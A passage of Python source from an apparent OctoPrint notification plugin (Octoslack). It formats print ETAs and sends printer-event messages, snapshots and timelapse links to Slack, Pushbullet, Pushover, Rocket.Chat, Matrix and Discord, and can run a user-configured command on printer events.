self.handle_event("Progress", channel, {}, True, False, None)
reaction = positive_reaction
else:
reaction = negative_reaction
self.add_message_reaction(slackAPIToken, channel, timestamp, reaction, False)
##Remove the processing reaction if it was previously added
if sent_processing_reaction:
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, True
)
def is_rtm_command_authorized_user(
self, authorized_users, username, enabled_commands, command
):
if authorized_users == None or len(authorized_users) == 0:
return True
##The failed command will be handled later
if not command in enabled_commands:
return True
auth_required = enabled_commands[command]["restricted"]
if not auth_required:
return True
username = username.strip().lower()
if username in authorized_users:
return True
return False
def get_slack_username(self, slackAPIToken, userid):
try:
if userid == None:
return
userid = userid.strip()
if len(userid) == 0:
return
slackAPIConnection = Slacker(slackAPIToken, timeout=SLACKER_TIMEOUT)
self._logger.debug(
"Retrieving username for Slack RTM message - User ID: " + userid
)
user_info_rsp = slackAPIConnection.users.info(userid)
self._logger.debug(
"Slack user info rsp for User ID: "
+ userid
+ ", Response: "
+ json.dumps(user_info_rsp.body)
)
return user_info_rsp.body["user"]["name"]
except Exception as e:
self._logger.exception(
"Error retrieving username for Slack RTM message - User ID: "
+ userid
+ ", Error: "
+ str(e.message)
)
def add_message_reaction(self, slackAPIToken, channel, timestamp, reaction, remove):
try:
if reaction == None:
return
reaction = reaction.strip()
if len(reaction) == 0:
return
slackAPIConnection = Slacker(slackAPIToken, timeout=SLACKER_TIMEOUT)
self._logger.debug(
"Sending Slack RTM reaction - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
)
if remove:
reaction_rsp = slackAPIConnection.reactions.remove(
channel=channel, timestamp=timestamp, name=reaction
)
else:
reaction_rsp = slackAPIConnection.reactions.add(
channel=channel, timestamp=timestamp, name=reaction
)
if reaction_rsp.successful == None or reaction_rsp.successful == False:
self._logger.debug(
"Slack RTM send reaction failed - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
+ json.dumps(reaction_rsp.body)
)
else:
self._logger.debug(
"Successfully sent Slack RTM reaction - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
)
except Exception as e:
self._logger.exception(
"Error sending Slack RTM reaction - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
+ ", Error: "
+ str(e.message)
)
def connection_method(self):
return self._settings.get(["connection_method"], merged=True)
def mattermost_mode(self):
return self._settings.get(["mattermost_compatability_mode"], merged=True)
def get_formatting_elements(self):
##returns bold formatting str, key/value separator (often used when bold can't be used), newline
connection_method = self.connection_method()
if connection_method == "WEBHOOK" and self.mattermost_mode():
return "**", "**", " ", "\n"
elif connection_method == "WEBHOOK" or connection_method == "APITOKEN":
return "*", "*", " ", "\n"
elif connection_method == "PUSHOVER":
return "<b>", "</b>", " ", "\n"
elif connection_method == "ROCKETCHAT":
return "*", "*", " ", "\n"
elif connection_method == "MATRIX":
return "<b>", "</b>", " ", "<br/>\n"
elif connection_method == "DISCORD":
return "**", "**", " ", "\n"
return "", "", ": ", "\n"
def format_eta(self, seconds):
"""For a given seconds to complete, returns an ETA string for humans.
"""
if seconds is None or seconds == "N/A":
return "N/A"
tz_config = self._settings.get(["timezone"], merged=True)
local_now = datetime.datetime.now()
local_eta = local_now + datetime.timedelta(seconds=seconds)
##Return local OS timestamp
if not tz_config or tz_config == "OS_Default":
eta = local_eta
now = local_now
else:
##Generate TZ adjusted timestamp
tz = pytz.timezone(tz_config)
utc_time = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)
now = utc_time.astimezone(tz)
eta = now + datetime.timedelta(seconds=seconds)
##Config UI string, not an actual python date/time format string
selected_date_format = self._settings.get(["eta_date_format"], merged=True)
if selected_date_format == "HH:mm <fuzzy date>":
return "%s %s" % (eta.strftime("%H:%M"), self.humanize_day_delta(now, eta))
elif selected_date_format == "hh:mm tt <fuzzy date>":
return "%s %s" % (
eta.strftime("%I:%M %p"),
self.humanize_day_delta(now, eta),
)
elif selected_date_format == "MM/dd/yyyy HH:mm":
return eta.strftime("%m/%d/%Y %H:%M")
elif selected_date_format == "dd/MM/yyyy HH:mm":
return eta.strftime("%d/%m/%Y %H:%M")
elif selected_date_format == "MM/dd/yyyy hh:mm tt":
return eta.strftime("%m/%d/%Y %I:%M %p")
elif selected_date_format == "dd/MM/yyyy hh:mm tt":
return eta.strftime("%d/%m/%Y %I:%M %p")
else:
return eta.strftime("%Y-%m-%d %H:%M")
def humanize_day_delta(self, now, eta):
new_now = datetime.date(now.year, now.month, now.day)
new_eta = datetime.date(eta.year, eta.month, eta.day)
delta_days = (new_eta - new_now).days
if delta_days == -1:
return "yesterday"
elif delta_days == 0:
return "today"
elif delta_days == 1:
return "tomorrow"
else:
return eta.strftime("%b %d")
def format_duration(self, seconds):
time_format = self._settings.get(["time_format"], merged=True)
if seconds == None:
return "N/A"
delta = datetime.timedelta(seconds=seconds)
time_format = self._settings.get(["time_format"], merged=True)
if time_format == "FUZZY":
return humanize.naturaldelta(delta)
elif time_format == "EXACT":
return octoprint.util.get_formatted_timedelta(delta)
else:
return self.humanize_duration(seconds)
def humanize_duration(self, total_seconds):
total_days = int(total_seconds / 86400)
total_seconds -= total_days * 86400
total_hours = int(total_seconds / 3600)
total_seconds -= total_hours * 3600
total_minutes = int(total_seconds / 60)
total_seconds = int(total_seconds - (total_minutes * 60))
time_str = ""
if total_days > 0:
if total_days == 1:
time_str += "1 day"
else:
time_str += str(total_days) + " days"
if total_hours > 0 or len(time_str) > 0:
if len(time_str) > 0:
time_str += " "
if total_hours != 1:
time_str += str(total_hours) + " hours"
else:
time_str += "1 hour"
if total_minutes > 0 or len(time_str) > 0:
if len(time_str) > 0:
time_str += " "
if total_minutes != 1:
time_str += str(total_minutes) + " minutes"
else:
time_str += "1 minute"
##Only display seconds if nothing else has been displayed or if there is less than 10 minutes left
if len(time_str) == 0 or (
total_days == 0 and total_hours == 0 and total_minutes < 10
):
if len(time_str) > 0:
time_str += " "
if total_seconds != 1:
time_str += str(total_seconds) + " seconds"
else:
time_str += "1 second"
return time_str
_bot_progress_last_req = None
_bot_progress_last_snapshot_queue = Queue.Queue()
_slack_next_progress_snapshot_time = 0
def execute_command(self, event, command, capture_output, command_rsp):
self._logger.debug(
"Executing command for event: " + event + ' - "' + command + '"'
)
return_code = None
command_output = None
error_msg = None
try:
execution_start = time.time()
if capture_output:
pipeline = run(command, stdout=Capture())
else:
pipeline = run(command)
execution_elapsed = time.time() - execution_start
pipeline_cmd = pipeline.commands[0]
if capture_output:
command_output = pipeline_cmd.stdout.text
return_code = pipeline_cmd.returncode
self._logger.debug(
"Command executed in "
+ str(round(execution_elapsed, 2))
+ " seconds"
+ " - ReturnCode: "
+ str(return_code)
+ ", Command: "
+ command
+ ", Output: "
+ str(command_output)
)
except Exception as e:
error_msg = e.message
if type(e) == ValueError:
self._logger.error(
"Failed to execute command for event: " + event + " - " + e.message
)
else:
self._logger.exception(
"Failed to execute command for event: " + event + " - " + str(e)
)
command_rsp.put(return_code)
command_rsp.put(command_output)
command_rsp.put(error_msg)
def send_slack_message(
self,
event,
event_settings,
event_payload,
channel_override,
fallback,
pretext,
title,
text,
color,
fields,
footer,
includeSnapshot,
print_pct_complete,
command_thread,
command_thread_rsp,
capture_command_returncode,
capture_command_output,
):
try:
slackAPIToken = None
slackWebHookUrl = None
pushbulletAccessToken = None
pushoverAppToken = None
rocketChatServerURL = None
rocketChatUsername = None
rocketChatPassword = None
matrixServerURL = None
matrixAccessToken = None
matrixUserID = None
bold_text_start, bold_text_end, name_val_sep, newline = (
self.get_formatting_elements()
)
connection_method = self.connection_method()
progress_update_method = (
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("UpdateMethod")
)
slack_progress_snapshot_min_interval = 60 * int(
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("SlackMinSnapshotUpdateInterval")
)
self._logger.debug("Octoslack connection method: " + connection_method)
if connection_method == "APITOKEN":
slackAPIToken = self._settings.get(
["slack_apitoken_config"], merged=True
).get("api_token")
if not slackAPIToken == None:
slackAPIToken = slackAPIToken.strip()
if slackAPIToken == None or len(slackAPIToken) == 0:
self._logger.error(
"Slack API connection not available, skipping message send"
)
return
elif connection_method == "WEBHOOK":
slackWebHookUrl = self._settings.get(
["slack_webhook_config"], merged=True
).get("webhook_url")
if not slackWebHookUrl == None:
slackWebHookUrl = slackWebHookUrl.strip()
if slackWebHookUrl == None or len(slackWebHookUrl) == 0:
self._logger.error(
"Slack WebHook connection not available, skipping message send"
)
return
elif connection_method == "PUSHBULLET":
pushbulletAccessToken = self._settings.get(
["pushbullet_config"], merged=True
).get("access_token")
if not pushbulletAccessToken == None:
pushbulletAccessToken = pushbulletAccessToken.strip()
if pushbulletAccessToken == None or len(pushbulletAccessToken) == 0:
self._logger.error(
"Pushbullet connection not available, skipping message send"
)
return
elif connection_method == "PUSHOVER":
pushoverAppToken = self._settings.get(
["pushover_config"], merged=True
).get("app_token")
if not pushoverAppToken == None:
pushoverAppToken = pushoverAppToken.strip()
if pushoverAppToken == None or len(pushoverAppToken) == 0:
self._logger.error(
"Pushover connection not available, skipping message send"
)
return
elif connection_method == "ROCKETCHAT":
rocketChatServerURL = self._settings.get(
["rocketchat_config"], merged=True
).get("server_url")
rocketChatUsername = self._settings.get(
["rocketchat_config"], merged=True
).get("username")
rocketChatPassword = self._settings.get(
["rocketchat_config"], merged=True
).get("password")
if not rocketChatServerURL == None:
rocketChatServerURL = rocketChatServerURL.strip()
if not rocketChatUsername == None:
rocketChatUsername = rocketChatUsername.strip()
if not rocketChatPassword == None:
rocketChatPassword = rocketChatPassword.strip()
if (
rocketChatServerURL == None
or len(rocketChatServerURL) == 0
or rocketChatUsername == None
or len(rocketChatUsername) == 0
or rocketChatPassword == None
or len(rocketChatPassword) == 0
):
self._logger.error(
"Rocket.Chat connection not available, skipping message send"
)
return
return
elif connection_method == "MATRIX":
matrixServerURL = self._settings.get(
["matrix_config"], merged=True
).get("server_url")
matrixAccessToken = self._settings.get(
["matrix_config"], merged=True
).get("access_token")
matrixUserID = self._settings.get(["matrix_config"], merged=True).get(
"user_id"
)
if not matrixServerURL == None:
matrixServerURL = matrixServerURL.strip()
if not matrixAccessToken == None:
matrixAccessToken = matrixAccessToken.strip()
if not matrixUserID == None:
matrixUserID = matrixUserID.strip()
if (
matrixServerURL == None
or len(matrixServerURL) == 0
or matrixAccessToken == None
or len(matrixAccessToken) == 0
or matrixUserID == None
or len(matrixUserID) == 0
):
self._logger.error(
"Matrix connection not available, skipping message send"
)
attachments = [{}]
attachment = attachments[0]
attachment["mrkdwn_in"] = ["text", "pretext"]
hosted_url = None
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
snapshot_url_to_append = None
snapshot_msg = None
snapshot_error_msgs = None
if includeSnapshot:
hosted_url, error_msgs, slack_rsp = self.upload_snapshot()
snapshot_error_msgs = error_msgs
if hosted_url:
if snapshot_upload_method == "SLACK":
if slackAPIToken:
now = time.time()
if event == "Progress" and (
self._slack_next_progress_snapshot_time > 0
and now < self._slack_next_progress_snapshot_time
):
snapshot_msg = None
else:
if event == "Progress":
self._slack_next_progress_snapshot_time = (
now + slack_progress_snapshot_min_interval
)
desc = event + " snapshot"
if (
event == "Progress"
and print_pct_complete
and print_pct_complete != "N/A"
):
desc = desc + " taken @ " + print_pct_complete
snapshot_msg = {
"local_file": hosted_url,
"filename": "snapshot.jpg",
"description": desc,
}
else:
if snapshot_error_msgs == None:
snapshot_error_msgs = []
self._logger.error(
"Slack API connection required for Slack asset uploads"
)
snapshot_error_msgs.append(
"Slack API connection required for Slack asset uploads"
)
else:
attachment["image_url"] = hosted_url
snapshot_url_to_append = hosted_url
##No need to append the URL to the body text as Slack will expose the URL itself
if (
connection_method == "APITOKEN"
or (
connection_method == "WEBHOOK"
and not self.mattermost_mode()
)
or connection_method == "PUSHBULLET"
or connection_method == "PUSHOVER"
or (
connection_method == "ROCKETCHAT"
and snapshot_upload_method == "ROCKETCHAT"
)
or (
connection_method == "MATRIX"
and snapshot_upload_method == "MATRIX"
)
or connection_method == "DISCORD"
):
snapshot_url_to_append = None
if snapshot_error_msgs:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += bold_text_start + "Snapshot error(s):" + bold_text_end
if connection_method == "WEBHOOK" and self.mattermost_mode():
text += "\n* " + "\n* ".join(error_msgs)
else:
for error_msg in snapshot_error_msgs:
if (
connection_method == "WEBHOOK"
or connection_method == "APITOKEN"
):
text += "\n *-* "
elif connection_method == "PUSHOVER":
text += (
newline
+ " "
+ bold_text_start
+ " - "
+ bold_text_end
+ " "
)
else:
text += newline + " - "
text += error_msg
if (
capture_command_returncode or capture_command_output
) and command_thread:
try:
cmd_return_code = None
cmd_output = None
cmd_error_msg = None
command_thread.join(COMMAND_EXECUTION_WAIT) ##seconds
if command_thread.isAlive():
cmd_error_msg = (
"Command did not return within "
+ str(COMMAND_EXECUTION_WAIT)
+ " seconds"
)
else:
cmd_return_code = command_thread_rsp.get()
cmd_output = command_thread_rsp.get()
cmd_error_msg = command_thread_rsp.get()
if capture_command_returncode and cmd_return_code:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command return code"
+ bold_text_end
+ name_val_sep
+ str(cmd_return_code)
)
if capture_command_output and cmd_output:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command output"
+ bold_text_end
+ name_val_sep
+ str(cmd_output)
)
if cmd_error_msg and len(cmd_error_msg.strip()) > 0:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command execution error"
+ bold_text_end
+ name_val_sep
+ str(cmd_error_msg.strip())
)
except Exception as e:
self._logger.exception(
"An error occurred while waiting for the command thread to return or while retrieving the command output: "
+ str(e)
)
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command execution error"
+ bold_text_end
+ name_val_sep
+ str(e.message)
)
if (
connection_method == "WEBHOOK"
and self.mattermost_mode()
and not footer == None
and len(footer) > 0
):
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += "`" + footer + "`"
footer = None
elif not footer == None and len(footer) > 0:
attachment["footer"] = footer
if not snapshot_url_to_append == None:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += hosted_url
if not fields == None:
attachment["fields"] = fields
if not fallback == None and len(fallback) > 0:
attachment["fallback"] = fallback
if not pretext == None and len(pretext) > 0:
if connection_method == "WEBHOOK" and self.mattermost_mode():
pretext = "##### " + pretext + " #####"
attachment["pretext"] = pretext
if not title == None and len(title) > 0:
attachment["title"] = title
if not color == None and len(color) > 0:
attachment["color"] = color
channels = channel_override
if channels == None or len(channels.strip()) == 0:
if connection_method == "WEBHOOK" or connection_method == "APITOKEN":
channels = self._settings.get(["channel"], merged=True)
elif connection_method == "PUSHBULLET":
channels = self._settings.get(
["pushbullet_config"], merged=True
).get("channel")
elif connection_method == "PUSHOVER":
channels = "$myself$"
elif connection_method == "ROCKETCHAT":
channels = self._settings.get(
["rocketchat_config"], merged=True
).get("channel")
elif connection_method == "MATRIX":
channels = self._settings.get(["matrix_config"], merged=True).get(
"channel"
)
elif connection_method == "DISCORD":
channels = self._settings.get(["discord_config"], merged=True).get(
"webhook_urls"
)
if not channels:
channels = ""
if event == "MovieDone":
upload_timelapse = (
self._settings.get(["supported_events"], merged=True)
.get("MovieDone")
.get("UploadMovie")
)
if upload_timelapse == True:
timelapse_url, timelapse_errors = self.upload_timelapse_movie(
event_payload["movie"], channels
)
upload_timelapse_link = (
self._settings.get(["supported_events"], merged=True)
.get("MovieDone")
.get("UploadMovieLink")
)
if timelapse_url and upload_timelapse_link:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Timelapse"
+ bold_text_end
+ name_val_sep
+ timelapse_url
)
if timelapse_errors:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += bold_text_start + "Timelapse error(s):" + bold_text_end
if connection_method == "WEBHOOK" and self.mattermost_mode():
text += "\n* " + "\n* ".join(timelapse_errors)
else:
for timelapse_error in timelapse_errors:
if (
connection_method == "WEBHOOK"
or connection_method == "APITOKEN"
):
text += "\n *-* "
elif connection_method == "PUSHOVER":
text += (
newline
+ " "
+ bold_text_start
+ " - "
+ bold_text_end
+ " "
)
else:
text += newline + " - "
text += timelapse_error
if not text == None and len(text) > 0:
attachment["text"] = text
##Generate message JSON
attachments_json = json.dumps(attachments)
self._logger.debug(
"postMessage - Channels: " + channels + ", JSON: " + attachments_json
)
slack_identity_config = self._settings.get(["slack_identity"], merged=True)
slack_as_user = slack_identity_config["existing_user"]
slack_icon_url = None
slack_icon_emoji = None
slack_username = None
if not slack_as_user:
if (
"icon_url" in slack_identity_config
and len(slack_identity_config["icon_url"].strip()) > 0
):
slack_icon_url = slack_identity_config["icon_url"].strip()
if (
not self.mattermost_mode()
and "icon_emoji" in slack_identity_config
and len(slack_identity_config["icon_emoji"].strip()) > 0
):
slack_icon_emoji = slack_identity_config["icon_emoji"].strip()
if (
"username" in slack_identity_config
and len(slack_identity_config["username"].strip()) > 0
):
slack_username = slack_identity_config["username"].strip()
allow_empty_channel = connection_method == "WEBHOOK"
if len(channels) == 0:
self._logger.debug("No channels configured")
self._logger.debug(
"postMessage - username="
+ str(slack_username)
+ ", as_user="
+ str(slack_as_user)
+ ", icon_url="
+ str(slack_icon_url)
+ ", icon_emoji="
+ str(slack_icon_emoji)
)
for channel in channels.split(","):
channel = channel.strip()
if len(channel) == 0 and not allow_empty_channel:
continue
allow_empty_channel = False
if not slackAPIToken == None and len(slackAPIToken) > 0:
try:
slackAPIConnection = Slacker(
slackAPIToken, timeout=SLACKER_TIMEOUT
)
##Applies to both standard Progress events as well as '@bot status' Slack RTM commands
if event == "Progress":
if (
self._bot_progress_last_req
and progress_update_method == "INPLACE"
and connection_method == "APITOKEN"
):
apiRsp = slackAPIConnection.chat.update(
self._bot_progress_last_req.body["channel"],
ts=self._bot_progress_last_req.body["ts"],
text="",
attachments=attachments_json,
)
else:
apiRsp = slackAPIConnection.chat.post_message(
channel,
text="",
username=slack_username,
as_user=slack_as_user,
attachments=attachments_json,
icon_url=slack_icon_url,
icon_emoji=slack_icon_emoji,
)
self._bot_progress_last_req = apiRsp
else:
apiRsp = slackAPIConnection.chat.post_message(
channel,
text="",
username=slack_username,
as_user=slack_as_user,
attachments=attachments_json,
icon_url=slack_icon_url,
icon_emoji=slack_icon_emoji,
)
self._logger.debug(
"Slack API message send response: " + apiRsp.raw
)
if snapshot_msg:
##TODO Doing the upload here makes it difficult to append any error messages to the slack message.
##consider doing the upload first
hosted_url, error_msgs, slack_resp = self.upload_slack_asset(
snapshot_msg["local_file"],
snapshot_msg["filename"],
snapshot_msg["description"],
channel,
None,
)
if snapshot_msg.get("local_file"):
try:
self._logger.debug(
"Deleting local Slack asset: "
+ str(snapshot_msg["local_file"])
)
os.remove(snapshot_msg["local_file"])
except Exception as e:
self._logger.error(
"Deletion of local Slack asset failed. Local path: {}, Error: {}".format(
snapshot_msg["local_file"], e
)
)
if event == "Progress":
# bump out the 'next time' again as an upload can take some time
_slack_next_progress_snapshot_time = (
time.time() + slack_progress_snapshot_min_interval
)
if (
progress_update_method == "INPLACE"
and connection_method == "APITOKEN"
and self._bot_progress_last_snapshot_queue.qsize()
> 0
):
while (
not self._bot_progress_last_snapshot_queue.empty()
):
prev_snapshot = (
self._bot_progress_last_snapshot_queue.get()
)
if prev_snapshot == None:
break
fid = None
try:
fid = prev_snapshot.body["file"]["id"]
self._logger.debug(
"Deleting Slack snapshot: " + str(fid)
)
slackAPIConnection.files.delete(fid)
except Exception as e:
self._logger.error(
"Slack snapshot deletion error. Slack FileID: {}, Error: {}".format(
str(fid), e
)
)
self._bot_progress_last_snapshot_queue.put(slack_resp)
except Exception as e:
self._logger.exception(
"Slack API message send error: " + str(e)
)
elif not slackWebHookUrl == None and len(slackWebHookUrl) > 0:
slack_msg = {}
slack_msg["channel"] = channel
if not slack_as_user == None:
slack_msg["as_user"] = slack_as_user
if not slack_icon_url == None and len(slack_icon_url.strip()) > 0:
slack_msg["icon_url"] = slack_icon_url.strip()
if (
not slack_icon_emoji == None
and len(slack_icon_emoji.strip()) > 0
):
slack_msg["icon_emoji"] = slack_icon_emoji.strip()
if not slack_username == None and len(slack_username.strip()) > 0:
slack_msg["username"] = slack_username.strip()
slack_msg["attachments"] = attachments
self._logger.debug(
"Slack WebHook postMessage json: " + json.dumps(slack_msg)
)
try:
webHook = IncomingWebhook(slackWebHookUrl)
webHookRsp = webHook.post(slack_msg)
self._logger.debug(
"Slack WebHook postMessage response: " + webHookRsp.text
)
if not webHookRsp.ok:
self._logger.error(
"Slack WebHook message send failed: " + webHookRsp.text
)
except Exception as e:
self._logger.exception(
"Slack WebHook message send error: " + str(e)
)
elif (
not pushbulletAccessToken == None and len(pushbulletAccessToken) > 0
):
self._logger.debug("Send Pushbullet msg start")
pb = Pushbullet(pushbulletAccessToken)
pb_title = None
pb_body = None
if not pretext == None and len(pretext) > 0:
pb_title = pretext
if not text == None and len(text) > 0:
pb_body = text
if not footer == None and len(footer) > 0:
if pb_body == None:
pb_body = ""
elif len(text) > 0:
pb_body += newline
pb_body += footer
if pb_title == None:
pb_title = ""
if pb_body == None:
pb_body = ""
self._logger.debug("Pushbullet msg title: " + pb_title)
self._logger.debug("Pushbullet msg body: " + pb_body)
channel_obj = None
if channel and not channel.lower() == "$myself$":
try:
channel_obj = pb.get_channel(channel)
except Exception as e:
self._logger.exception(
"Failed to retrieve Pushbullet channel ("
+ channel
+ ") information: "
+ str(e)
)
continue
if hosted_url and len(hosted_url) > 0:
##def push_file(self, file_name, file_url, file_type, body=None, title=None, device=None, chat=None, email=None, channel=None):
pb_filename = hosted_url[hosted_url.rfind("/") + 1 :]
self._logger.debug(
"Pushbullet msg image details: file_name: "
+ pb_filename
+ ", file_url="
+ hosted_url
)
self._logger.debug("Executing Pushbullet push file")
##Pushbullet seems to universally accept any image file_type (e.g. for png or jpg) but something is required to render correctly
push_rsp = pb.push_file(
file_name=pb_filename,
file_url=hosted_url,
file_type="image/png",
title=pb_title,
body=pb_body,
channel=channel_obj,
)
else:
##def push_note(self, title, body, device=None, chat=None, email=None, channel=None):
self._logger.debug("Executing Pushbullet push note")
push_rsp = pb.push_note(
title=pb_title, body=pb_body, channel=channel_obj
)
self._logger.debug(
"Pushbullet push response: " + json.dumps(push_rsp)
)
elif not pushoverAppToken == None and len(pushoverAppToken) > 0:
self._logger.debug("Send Pushover msg start")
pushoverUserKey = self._settings.get(
["pushover_config"], merged=True
).get("user_key")
if not pushoverUserKey == None:
pushoverUserKey = pushoverUserKey.strip()
if pushoverUserKey == None or len(pushoverUserKey) == 0:
self._logger.error(
"Pushover User Key not available, skipping message send"
)
return
po_title = None
po_body = None
pb_image_url = None
pb_image_title = None
pb_image_local_path = None
if not pretext == None and len(pretext) > 0:
po_title = pretext
if not text == None and len(text) > 0:
po_body = text
if not footer == None and len(footer) > 0:
if po_body == None:
po_body = ""
elif len(text) > 0:
po_body += newline
po_body += footer
if po_title == None:
po_title = ""
if po_body == None:
po_body = ""
if hosted_url and len(hosted_url) > 0:
if snapshot_upload_method == "PUSHOVER":
##is a local file path
pb_image_local_path = hosted_url
else:
pb_image_url = hosted_url
pb_image_title = hosted_url[hosted_url.rfind("/") + 1 :]
po_sound = event_settings["PushoverSound"]
if po_sound:
po_sound = po_sound.strip()
if len(po_sound) == 0:
po_sound = None
po_priority = event_settings["PushoverPriority"]
if po_priority:
po_priority = po_priority.strip()
if len(po_priority) == 0:
po_priorirty = None
po_expire = None
po_retry = None
if po_priority == "2":
po_expire = 60
po_retry = 30
self._logger.debug("Pushover msg title: " + po_title)
self._logger.debug("Pushover msg body: " + po_body)
self._logger.debug("Pushover msg sound: " + str(po_sound))
self._logger.debug("Pushover msg priority: " + str(po_priority))
self._logger.debug("Pushover msg expire: " + str(po_expire))
self._logger.debug("Pushover msg retry: " + str(po_retry))
try:
po = PushoverAPI(pushoverAppToken)
##send_message(user, message, device=None, title=None, url=None, url_title=None, image=None, priority=None, retry=None, expire=None, callback_url=None, timestamp=None, sound=None, html=False)
po_rsp = po.send_message(
user=pushoverUserKey,
title=po_title,
message=po_body,
url=pb_image_url,
url_title=pb_image_title,
image=pb_image_local_path,
priority=po_priority,
retry=po_retry,
expire=po_expire,
sound=po_sound,
html=1,
)
self._logger.debug(
"Pushover push response: " + json.dumps(po_rsp)
)
except Exception as e:
self._logger.exception("Pushover send error: " + str(e))
if pb_image_local_path:
self._logger.debug(
"Deleting local Pushover asset: " + str(pb_image_local_path)
)
os.remove(pb_image_local_path)
elif (
not rocketChatServerURL == None
and len(rocketChatServerURL) > 0
and not rocketChatUsername == None
and len(rocketChatUsername) > 0
and not rocketChatPassword == None
and len(rocketChatPassword) > 0
):
self._logger.debug("Send Rocket.Chat msg start")
##api = RocketChatAPI(settings={'username': 'someuser', 'password': 'somepassword',
## 'domain': 'https://myrockethchatdomain.com'})
rc = RocketChatAPI(
settings={
"username": rocketChatUsername,
"password": rocketChatPassword,
"domain": rocketChatServerURL,
}
)
cc_msg = ""
rc_image_local_path = None
if hosted_url and len(hosted_url) > 0:
if snapshot_upload_method == "ROCKETCHAT":
# is a local file path
rc_image_local_path = hosted_url
if not pretext == None and len(pretext) > 0:
rc_msg = "_*" + pretext + "*_"
if not text == None and len(text) > 0:
if len(rc_msg) > 0:
rc_msg = rc_msg + "\n"
rc_msg = rc_msg + text
if not footer == None and len(footer) > 0:
if len(rc_msg) > 0:
rc_msg = rc_msg + "\n"
rc_msg = rc_msg + footer
self._logger.debug(
"Rocket.Chat local image path: " + str(rc_image_local_path)
)
self._logger.debug("Rocket.Chat msg: " + rc_msg)
try:
##def send_message(self, message, room_id, **kwargs):
##def upload_file(self, room_id, description, file, message, mime_type='text/plain', **kwargs):
rc_room_id = rc.get_room_id(channel)
self._logger.debug(
"Rocket.Chat channel: "
+ channel
+ ", roomid: "
+ str(rc_room_id)
)
if rc_image_local_path and len(rc_image_local_path) > 0:
self._logger.debug(
"Rocket.Chat uploading asset + sending message"
)
rc_rsp = rc.upload_file(
room_id=rc_room_id,
description=None,
file=rc_image_local_path,
message=rc_msg,
mime_type="image/png",
)
else:
self._logger.debug("Rocket.Chat sending message")
rc_rsp = rc.send_message(message=rc_msg, room_id=rc_room_id)
self._logger.debug(
"Rocket.Chat send message response: " + json.dumps(rc_rsp)
)
except requests.exceptions.HTTPError as he:
self._logger.exception(
"Rocket.Chat send HTTP error: " + str(he.response.text)
)
except Exception as e:
self._logger.exception("Rocket.Chat send error: " + str(e))
if rc_image_local_path:
self._logger.debug(
"Deleting local Rocket.Chat asset: "
+ str(rc_image_local_path)
)
os.remove(rc_image_local_path)
elif (
not matrixServerURL == None
and len(matrixServerURL) > 0
and not matrixAccessToken == None
and len(matrixAccessToken) > 0
and not matrixUserID == None
and len(matrixUserID) > 0
):
self._logger.debug("Send Matrix msg start")
##https://matrix.org/docs/spec/client_server/latest#m-room-message-msgtypes
try:
##Room def send_html(self, html, body=None, msgtype="m.text"):
matrix = MatrixClient(
base_url=matrixServerURL,
token=matrixAccessToken,
user_id=matrixUserID,
)
self._logger.debug(
"Matrix authenticated user_id: " + str(matrix.user_id)
)
matrix_msg = ""
if not pretext == None and len(pretext) > 0:
matrix_msg = matrix_msg + "<h3>" + pretext + "</h3>"
##matrix_msg = matrix_msg + "<i><b>" + pretext + "</b><i>"
matrix_msg = matrix_msg + "<blockquote>"
if not text == None and len(text) > 0:
if len(matrix_msg) > 0 and not matrix_msg.endswith(
"<blockquote>"
):
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + text
if not footer == None and len(footer) > 0:
if len(matrix_msg) > 0 and not matrix_msg.endswith(
"<blockquote>"
):
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + footer
mxc_url = None
if (
hosted_url
and len(hosted_url) > 0
and snapshot_upload_method == "MATRIX"
):
if len(matrix_msg) > 0 and not matrix_msg.endswith(
"<blockquote>"
):
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + "<img src='" + hosted_url + "'>"
if len(matrix_msg) > 0:
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + "</blockquote><br/>"
self._logger.debug("Matrix msg: " + matrix_msg)
matrix_room = MatrixRoom(matrix, channel)
matrix_rsp = matrix_room.send_html(html=matrix_msg)
self._logger.debug(
"Matrix send message response: " + json.dumps(matrix_rsp)
)
except Exception as e:
self._logger.exception("Matrix send error: " + str(e))
elif (
connection_method == "DISCORD"
and (not channel == None)
and len(channel) > 0
):
try:
discordWebHookUrl = channel
self._logger.debug(
"Discord msg channel WebHook: " + str(discordWebHookUrl)
)
discord_color = None
if color == "good":
discord_color = 242424
elif color == "warning":
discord_color = 16758825
elif color == "danger":
discord_color = 16212835
alternate_username = self._settings.get(
["discord_config"], merged=True
).get("alternate_username")
if (
not alternate_username
or len(alternate_username.strip()) == 0
):
alternate_username = None
avatar_url = self._settings.get(
["discord_config"], merged=True
).get("avatar_url")
if not avatar_url or len(avatar_url.strip()) == 0:
avatar_url = None
self._logger.debug(
"Discord msg alternate username: " + str(alternate_username)
)
self._logger.debug("Discord msg avatar url: " + str(avatar_url))
self._logger.debug("Discord msg color: " + str(discord_color))
content = "**" + pretext + "**"
discord = DiscordWebhook(
url=discordWebHookUrl,
username=alternate_username,
avatar_url=avatar_url,
content=content,
)
embed = DiscordEmbed(
